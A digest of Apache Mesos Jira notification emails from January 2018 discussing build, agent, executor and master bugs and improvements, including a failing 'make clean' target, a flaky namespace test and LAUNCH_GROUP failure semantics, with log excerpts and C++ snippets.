[jira] [Assigned] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Till Toenshoff reassigned MESOS-8477:
-

Assignee: Till Toenshoff

> Make clean fails without Python artifacts.
> --
>
> Key: MESOS-8477
> URL: https://issues.apache.org/jira/browse/MESOS-8477
> Project: Mesos
>  Issue Type: Bug
>  Components: build
>Affects Versions: 1.5.0
>Reporter: Till Toenshoff
>Assignee: Till Toenshoff
>Priority: Major
>
> Make clean may fail if there are no Python artifacts created by previous 
> builds.  
> {noformat}
> $ make clean{noformat}
> {noformat}
> [...]
> rm -rf java/target
> rm -f examples/java/*.class
> rm -f java/jni/org_apache_mesos*.h
> find python \( -name "build" -o -name "dist" -o -name "*.pyc" \
>   -o -name "*.egg-info" \) -exec rm -rf '{}' \+
> find: ‘python’: No such file or directory
> make[1]: *** [clean-python] Error 1
> make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
> make: *** [clean-recursive] Error 1{noformat}
>  
> Triggered by 
> [https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335366#comment-16335366
 ] 

Till Toenshoff commented on MESOS-8477:
---

Prefixing that {{find}} with a dash to make any failure non-fatal might do the 
trick here.
{noformat}
-find python \( -name "build" -o -name "dist" -o -name "*.pyc" -o -name 
"*.egg-info" \) -exec rm -rf '{}' \+{noformat}

> Make clean fails without Python artifacts.
> --
>
> Key: MESOS-8477
> URL: https://issues.apache.org/jira/browse/MESOS-8477
> Project: Mesos
>  Issue Type: Bug
>  Components: build
>Affects Versions: 1.5.0
>Reporter: Till Toenshoff
>Priority: Major
>
> Make clean may fail if there are no Python artifacts created by previous 
> builds.  
> {noformat}
> $ make clean{noformat}
> {noformat}
> [...]
> rm -rf java/target
> rm -f examples/java/*.class
> rm -f java/jni/org_apache_mesos*.h
> find python \( -name "build" -o -name "dist" -o -name "*.pyc" \
>   -o -name "*.egg-info" \) -exec rm -rf '{}' \+
> find: ‘python’: No such file or directory
> make[1]: *** [clean-python] Error 1
> make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
> make: *** [clean-recursive] Error 1{noformat}
>  
> Triggered by 
> [https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8477) Make clean fails without Python artifacts.

2018-01-22 Thread Till Toenshoff (JIRA)
Till Toenshoff created MESOS-8477:
-

 Summary: Make clean fails without Python artifacts.
 Key: MESOS-8477
 URL: https://issues.apache.org/jira/browse/MESOS-8477
 Project: Mesos
  Issue Type: Bug
  Components: build
Affects Versions: 1.5.0
Reporter: Till Toenshoff


Make clean may fail if there are no Python artifacts created by previous 
builds.  
{noformat}
$ make clean{noformat}
{noformat}
[...]
rm -rf java/target
rm -f examples/java/*.class
rm -f java/jni/org_apache_mesos*.h
find python \( -name "build" -o -name "dist" -o -name "*.pyc"   \
  -o -name "*.egg-info" \) -exec rm -rf '{}' \+
find: ‘python’: No such file or directory
make[1]: *** [clean-python] Error 1
make[1]: Leaving directory `/home/centos/workspace/mesos/build/src'
make: *** [clean-recursive] Error 1{noformat}
 

Triggered by 
[https://github.com/apache/mesos/blob/62d392704c499e06da0323e50dfd016cdac06f33/src/Makefile.am#L2218-L2219]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8389) Notion of "removable" task in master code is inaccurate.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8389?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler reassigned MESOS-8389:
--

Assignee: Benjamin Mahler

> Notion of "removable" task in master code is inaccurate.
> 
>
> Key: MESOS-8389
> URL: https://issues.apache.org/jira/browse/MESOS-8389
> Project: Mesos
>  Issue Type: Improvement
>  Components: master
>Reporter: Benjamin Mahler
>Assignee: Benjamin Mahler
>Priority: Major
>
> In the past, the notion of a "removable" task meant: the task is terminal and 
> acknowledged. It appears now that a removable task is defined purely by its 
> state (terminal or unreachable), not by whether the terminal update has been 
> acknowledged.
> As a result, the code that calls this function ({{isRemovable}}) ends up 
> being unintuitive. One example of a confusing piece of code is within 
> {{updateTask}}. Here, we have logic which says: if the task is removable, 
> recover the resources *but don't remove it*. This seems more intuitive if 
> directly described as: "if the task is no longer consuming resources (e.g. it 
> transitioned to terminal or unreachable), then recover the resources".
> If one looks up the documentation of {{isRemovable}}, it says "When a task 
> becomes removable, it is erased from the master's primary task data 
> structures", but that isn't accurate, since this function doesn't check 
> whether the terminal task has been acknowledged, which is required for a task 
> to be removable.
> I think an easy improvement here would be to move this notion of removable 
> towards something like {{isTerminalOrUnreachable}}. We could also think about 
> how to name this concept more generally, like {{canReleaseResources}} to 
> describe whether the task's resources are considered allocated.
> If we do introduce a notion of {{isRemovable}}, it should say whether the 
> task can be removed from the master, which includes checking that terminal 
> tasks have been acknowledged.
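
To make the distinction concrete, here is a minimal sketch of the two
predicates discussed above, using simplified hypothetical types (not the
master's actual data structures):
{code:cpp}
// Hypothetical, simplified task states for illustration only.
enum class TaskState { RUNNING, FINISHED, FAILED, KILLED, UNREACHABLE };

struct Task
{
  TaskState state;
  bool terminalUpdateAcknowledged;  // Whether the terminal update was acked.
};

// What the current `isRemovable` actually checks: the state alone.
bool isTerminalOrUnreachable(const Task& task)
{
  return task.state != TaskState::RUNNING;
}

// What "removable" should arguably mean: the task no longer needs to live in
// the master's primary data structures, i.e., it is terminal or unreachable
// *and* any terminal update has been acknowledged.
bool isRemovable(const Task& task)
{
  return isTerminalOrUnreachable(task) &&
         (task.state == TaskState::UNREACHABLE ||
          task.terminalUpdateAcknowledged);
}
{code}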



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-8305:
--
Target Version/s: 1.6.0

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335310#comment-16335310
 ] 

Qian Zhang commented on MESOS-8305:
---

RR: https://reviews.apache.org/r/65278/

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8411) Killing a queued task can lead to the command executor never terminating.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8411?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8411:
---
Target Version/s: 1.4.2, 1.6.0, 1.5.1, 1.3.3  (was: 1.6.0)

> Killing a queued task can lead to the command executor never terminating.
> -
>
> Key: MESOS-8411
> URL: https://issues.apache.org/jira/browse/MESOS-8411
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.3.1, 1.4.1
>Reporter: Benjamin Mahler
>Assignee: Meng Zhu
>Priority: Critical
>
> If a task is killed while the executor is re-registering, we will remove it 
> from queued tasks and shut down the executor if all of its initial tasks 
> could not be delivered. However, there is a case (within {{Slave::___run}}) 
> where we leave the executor running; the race is:
> # Command-executor task launched.
> # Command executor sends registration message. Agent tells containerizer to 
> update the resources before it sends the tasks to the executor.
> # Kill arrives, and we synchronously remove the task from queued tasks.
> # Containerizer finishes updating the resources, and in {{Slave::___run}} the 
> killed task is ignored.
> # Command executor stays running!
> Executors could have a timeout to handle this case, but it's not clear that 
> all executors will implement this correctly. It would be better to have a 
> defensive policy that will shut down an executor if all of its initial batch 
> of tasks were killed prior to delivery.
> In order to implement this, one approach discussed with [~vinodkone] is to 
> look at the running + terminated but unacked + completed tasks, and if empty, 
> shut the executor down in the {{Slave::___run}} path. This will require us to 
> check that the completed task cache size is set to at least 1, and this also 
> assumes that the completed tasks are not cleared based on time or during 
> agent recovery.
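
A minimal sketch of that defensive check, with hypothetical containers
standing in for the agent's per-executor state (the actual {{Slave::___run}}
change may look different):
{code:cpp}
#include <deque>
#include <map>
#include <string>

// Hypothetical stand-in for the agent's per-executor bookkeeping.
struct ExecutorState
{
  std::map<std::string, int> launchedTasks;    // Running tasks.
  std::map<std::string, int> terminatedTasks;  // Terminal but unacknowledged.
  std::deque<std::string> completedTasks;      // Terminal and acknowledged.
};

// If the executor has no running, unacknowledged, or completed tasks, its
// entire initial batch of tasks was killed before delivery, so the agent
// can shut it down.
bool shouldShutdown(const ExecutorState& executor)
{
  return executor.launchedTasks.empty() &&
         executor.terminatedTasks.empty() &&
         executor.completedTasks.empty();
}
{code}
As noted above, this only holds if the completed task cache keeps at least one
entry and is not cleared based on time or during agent recovery.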



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8411) Killing a queued task can lead to the command executor never terminating.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8411?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8411:
---
Affects Version/s: (was: 1.3.0)
   1.3.1
   1.4.1

> Killing a queued task can lead to the command executor never terminating.
> -
>
> Key: MESOS-8411
> URL: https://issues.apache.org/jira/browse/MESOS-8411
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.3.1, 1.4.1
>Reporter: Benjamin Mahler
>Assignee: Meng Zhu
>Priority: Critical
>
> If a task is killed while the executor is re-registering, we will remove it 
> from queued tasks and shut down the executor if all of its initial tasks 
> could not be delivered. However, there is a case (within {{Slave::___run}}) 
> where we leave the executor running; the race is:
> # Command-executor task launched.
> # Command executor sends registration message. Agent tells containerizer to 
> update the resources before it sends the tasks to the executor.
> # Kill arrives, and we synchronously remove the task from queued tasks.
> # Containerizer finishes updating the resources, and in {{Slave::___run}} the 
> killed task is ignored.
> # Command executor stays running!
> Executors could have a timeout to handle this case, but it's not clear that 
> all executors will implement this correctly. It would be better to have a 
> defensive policy that will shut down an executor if all of its initial batch 
> of tasks were killed prior to delivery.
> In order to implement this, one approach discussed with [~vinodkone] is to 
> look at the running + terminated but unacked + completed tasks, and if empty, 
> shut the executor down in the {{Slave::___run}} path. This will require us to 
> check that the completed task cache size is set to at least 1, and this also 
> assumes that the completed tasks are not cleared based on time or during 
> agent recovery.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6812) Invalid entries in /proc/self/mountinfo when using persistent storage

2018-01-22 Thread Jie Yu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6812?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16335241#comment-16335241
 ] 

Jie Yu commented on MESOS-6812:
---

Hmm, that sounds like a kernel or systemd issue? Do you know why systemd 
complains about the mount table? It looks fine to me.

> Invalid entries in /proc/self/mountinfo when using persistent storage
> -
>
> Key: MESOS-6812
> URL: https://issues.apache.org/jira/browse/MESOS-6812
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.0.1, 1.4.0
>Reporter: Mateusz Moneta
>Priority: Minor
>
> Hello,
> we use Mesos 1.0.1 on Debian Jessie with Kernel {{4.6.1-1~bpo8+1 
> (2016-06-14)}} and Docker 1.12.5.
> We have the problem that, on slaves which run tasks with persistent storage, 
> Mesos adds invalid entries to {{/proc/self/mountinfo}}. Example:
> {noformat}
> 79 46 253:5 
> /lib/mesos/volumes/roles/slave/services_proxy_production_mongo#data#4d7ae497-a0f5-11e6-8a4f-e0db55fde00f
>  
> /var/lib/mesos/slaves/56e2e372-da8e-47d0-ac25-0f55945c625c-S2/frameworks/fa8eb417-29e3-4640-9405-ab84d2ef9794-0001/executors/services_proxy_production_mongo.4d7ae498-a0f5-11e6-8a4f-e0db55fde00f/runs/f84f2541-7e44-4226-80c6-93f438e50fd5/data
>  rw,relatime shared:28 - ext4 /dev/mapper/main-var rw,data=ordered
> {noformat}
> This causes many errors in {{/var/log/daemon.log}}:
> {noformat}
> Dec 19 13:56:49 s10.mesos.services.ams.osa systemd[1]: Failed to reread 
> /proc/self/mountinfo: Invalid argument
> {noformat}
> Mesos slave configuration:
> {noformat}
> ULIMIT="-n 8192"
> CLUSTER=services
> MASTER=`cat /etc/mesos/zk`
> MESOS_CONTAINERIZERS=docker,mesos
> MESOS_EXECUTOR_REGISTRATION_TIMEOUT=5mins
> MESOS_CREDENTIAL=/etc/mesos.credentials
> MESOS_WORK_DIR=/var/lib/mesos
> MESOS_PORT=8080
> MESOS_EXECUTOR_ENVIRONMENT_VARIABLES='{"SSL_ENABLED": "true","SSL_KEY_FILE": 
> "/etc/ssl/certs/star.mesos.services.ams.osa.key", "SSL_CERT_FILE": 
> "/etc/ssl/certs/star.mesos.services.ams.osa.pem"}'
> MESOS_MODULES=file:///usr/etc/mesos/mesos-slave-modules.json
> MESOS_CONTAINER_LOGGER=org_apache_mesos_LogrotateContainerLogger
> MESOS_LOGGING_LEVEL=INFO
> LIBPROCESS_SSL_ENABLED=true
> LIBPROCESS_SSL_KEY_FILE=/etc/ssl/certs/star.mesos.services.ams.osa.key
> LIBPROCESS_SSL_CERT_FILE=/etc/ssl/certs/star.mesos.services.ams.osa.pem
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8476:
---
Environment: (was: Currently, the agent will retrieve the container 
status upon on each task status update in order to augment the status update 
with the container status information (e.g. ip address). This has made the 
status update processing asynchronous when it comes to the side effects to the 
agent data structures. Consequently, several bugs have occurred: MESOS-5380, 
MESOS-7865, MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.)

> Store executor container status in the agent after it launches.
> ---
>
> Key: MESOS-8476
> URL: https://issues.apache.org/jira/browse/MESOS-8476
> Project: Mesos
>  Issue Type: Improvement
>  Components: agent, containerization
>Reporter: Benjamin Mahler
>Priority: Major
>
> Currently, the agent will retrieve the container status on each task 
> status update in order to augment the status update with the container status 
> information (e.g. ip address). This has made the status update processing 
> asynchronous when it comes to the side effects to the agent data structures. 
> Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Mahler updated MESOS-8476:
---
Description: 
Currently, the agent will retrieve the container status on each task 
status update in order to augment the status update with the container status 
information (e.g. ip address). This has made the status update processing 
asynchronous when it comes to the side effects to the agent data structures. 
Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.
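
A sketch of the proposed interface change, using hypothetical simplified types
(the real containerizer API differs):
{code:cpp}
#include <future>
#include <string>

// Hypothetical, simplified container status; the real one carries more,
// e.g. the network info used to fill in the IP address.
struct ContainerStatus
{
  std::string ipAddress;
};

// After the change: launch() resolves with the container status, which the
// agent stores once, instead of querying the containerizer on every task
// status update.
struct LaunchResult
{
  bool launched;
  ContainerStatus status;
};

std::future<LaunchResult> launch(const std::string& containerId)
{
  // Stubbed out for illustration: a real containerizer would start the
  // container and resolve the future once its status is known.
  std::promise<LaunchResult> promise;
  promise.set_value(LaunchResult{true, ContainerStatus{"10.0.0.2"}});
  return promise.get_future();
}
{code}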

> Store executor container status in the agent after it launches.
> ---
>
> Key: MESOS-8476
> URL: https://issues.apache.org/jira/browse/MESOS-8476
> Project: Mesos
>  Issue Type: Improvement
>  Components: agent, containerization
> Environment: Currently, the agent will retrieve the container status 
> on each task status update in order to augment the status update with 
> the container status information (e.g. ip address). This has made the status 
> update processing asynchronous when it comes to the side effects to the agent 
> data structures. Consequently, several bugs have occurred: MESOS-5380, 
> MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.
>Reporter: Benjamin Mahler
>Priority: Major
>
> Currently, the agent will retrieve the container status on each task 
> status update in order to augment the status update with the container status 
> information (e.g. ip address). This has made the status update processing 
> asynchronous when it comes to the side effects to the agent data structures. 
> Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, MESOS-8459.
> It's odd that the container status, which seems to define the properties of 
> the executor's container, needs to be retrieved in the status update path. 
> Rather, the agent could just store this once when the executor is launched 
> and remember it.
> Currently, the containerizer interface exposes the container status only as a 
> separate call. However, to simplify the fix here, the containerizer could 
> expose it directly in the {{launch()}} Future.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8476) Store executor container status in the agent after it launches.

2018-01-22 Thread Benjamin Mahler (JIRA)
Benjamin Mahler created MESOS-8476:
--

 Summary: Store executor container status in the agent after it 
launches.
 Key: MESOS-8476
 URL: https://issues.apache.org/jira/browse/MESOS-8476
 Project: Mesos
  Issue Type: Improvement
  Components: agent, containerization
 Environment: Currently, the agent will retrieve the container status 
on each task status update in order to augment the status update with the 
container status information (e.g. ip address). This has made the status update 
processing asynchronous when it comes to the side effects to the agent data 
structures. Consequently, several bugs have occurred: MESOS-5380, MESOS-7865, 
MESOS-8459.

It's odd that the container status, which seems to define the properties of the 
executor's container, needs to be retrieved in the status update path. Rather, 
the agent could just store this once when the executor is launched and remember 
it.

Currently, the containerizer interface exposes the container status only as a 
separate call. However, to simplify the fix here, the containerizer could 
expose it directly in the {{launch()}} Future.
Reporter: Benjamin Mahler






--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8475) Event-specific overloads for 'Master::Subscribers::Subscriber::send()'

2018-01-22 Thread Greg Mann (JIRA)
Greg Mann created MESOS-8475:


 Summary: Event-specific overloads for 
'Master::Subscribers::Subscriber::send()'
 Key: MESOS-8475
 URL: https://issues.apache.org/jira/browse/MESOS-8475
 Project: Mesos
  Issue Type: Improvement
Reporter: Greg Mann


The code could be more efficient and more readable if we introduce 
event-specific overloads for the {{Master::Subscribers::Subscriber::send()}} 
method.
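
For illustration, a sketch of what such overloads could look like, with
hypothetical simplified event types (the real events are protobuf messages):
{code:cpp}
#include <iostream>
#include <string>

// Hypothetical, simplified event types for illustration.
struct TaskUpdated { std::string taskId; };
struct FrameworkRemoved { std::string frameworkId; };

struct Subscriber
{
  // One overload per event type: each builds exactly the message it needs,
  // so no generic event object has to be constructed and copied up front.
  void send(const TaskUpdated& event)
  {
    std::cout << "TASK_UPDATED " << event.taskId << std::endl;
  }

  void send(const FrameworkRemoved& event)
  {
    std::cout << "FRAMEWORK_REMOVED " << event.frameworkId << std::endl;
  }
};
{code}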



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8184) Implement master's AcknowledgeOfferOperationMessage handler.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8184?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8184:
--
Sprint: Mesosphere Sprint 68, Mesosphere Sprint 69, Mesosphere Sprint 70, 
Mesosphere Sprint 73  (was: Mesosphere Sprint 68, Mesosphere Sprint 69, 
Mesosphere Sprint 70)

> Implement master's AcknowledgeOfferOperationMessage handler.
> 
>
> Key: MESOS-8184
> URL: https://issues.apache.org/jira/browse/MESOS-8184
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Gastón Kleiman
>Priority: Major
>  Labels: mesosphere
>
> This handler should validate the message and forward it to the corresponding 
> agent/ERP.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8468:
--
Story Points: 5

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call fails (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not what a user expects. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to how a task failure only takes down its own task group. 
> We should adjust the semantics so that a failed `LAUNCH_GROUP` does not take 
> down the executor or affect other task groups.
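
For illustration, a minimal sketch of the adjusted semantics, with simplified
types ({{dropTaskGroup}} is a hypothetical helper, not the actual fix):
{code:cpp}
#include <iostream>
#include <string>
#include <vector>

// Hypothetical, simplified launch response for illustration.
struct Response
{
  int code;          // HTTP status of the LAUNCH_NESTED_CONTAINER call.
  std::string body;
};

// Hypothetical helper: fail only the tasks of the given task group.
void dropTaskGroup(size_t taskGroupIndex)
{
  std::cerr << "Dropping task group " << taskGroupIndex << std::endl;
}

void handleLaunchResponses(const std::vector<Response>& responses)
{
  for (size_t i = 0; i < responses.size(); ++i) {
    if (responses[i].code != 200) {
      // Instead of `_shutdown()`, take down only the affected task group;
      // the other task groups keep running.
      dropTaskGroup(i);
    }
  }
}
{code}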



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman updated MESOS-8468:
--
Sprint: Mesosphere Sprint 73

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call fails (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not what a user expects. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to how a task failure only takes down its own task group. 
> We should adjust the semantics so that a failed `LAUNCH_GROUP` does not take 
> down the executor or affect other task groups.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-8468) `LAUNCH_GROUP` failure tears down the default executor.

2018-01-22 Thread JIRA

 [ 
https://issues.apache.org/jira/browse/MESOS-8468?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Gastón Kleiman reassigned MESOS-8468:
-

Assignee: Gastón Kleiman

> `LAUNCH_GROUP` failure tears down the default executor.
> ---
>
> Key: MESOS-8468
> URL: https://issues.apache.org/jira/browse/MESOS-8468
> Project: Mesos
>  Issue Type: Bug
>Affects Versions: 1.2.0, 1.3.0, 1.4.0, 1.5.0
>Reporter: Chun-Hung Hsiao
>Assignee: Gastón Kleiman
>Priority: Critical
>  Labels: default-executor, mesosphere
>
> The following code in the default executor 
> (https://github.com/apache/mesos/blob/12be4ba002f2f5ff314fbc16af51d095b0d90e56/src/launcher/default_executor.cpp#L525-L535)
>  shows that if a `LAUNCH_NESTED_CONTAINER` call fails (say, due to a 
> fetcher failure), the whole executor will be shut down:
> {code:cpp}
> // Check if we received a 200 OK response for all the
> // `LAUNCH_NESTED_CONTAINER` calls. Shutdown the executor
> // if this is not the case.
> foreach (const Response& response, responses.get()) {
>   if (response.code != process::http::Status::OK) {
> LOG(ERROR) << "Received '" << response.status << "' ("
><< response.body << ") while launching child container";
> _shutdown();
> return;
>   }
> }
> {code}
> This is not what a user expects. Instead, one would expect that a failed 
> `LAUNCH_GROUP` won't affect other task groups launched by the same executor, 
> similar to how a task failure only takes down its own task group. 
> We should adjust the semantics so that a failed `LAUNCH_GROUP` does not take 
> down the executor or affect other task groups.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Chun-Hung Hsiao (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334908#comment-16334908
 ] 

Chun-Hung Hsiao edited comment on MESOS-8474 at 1/22/18 9:16 PM:
-

This is caused by a race in which the master may send out an offer between 
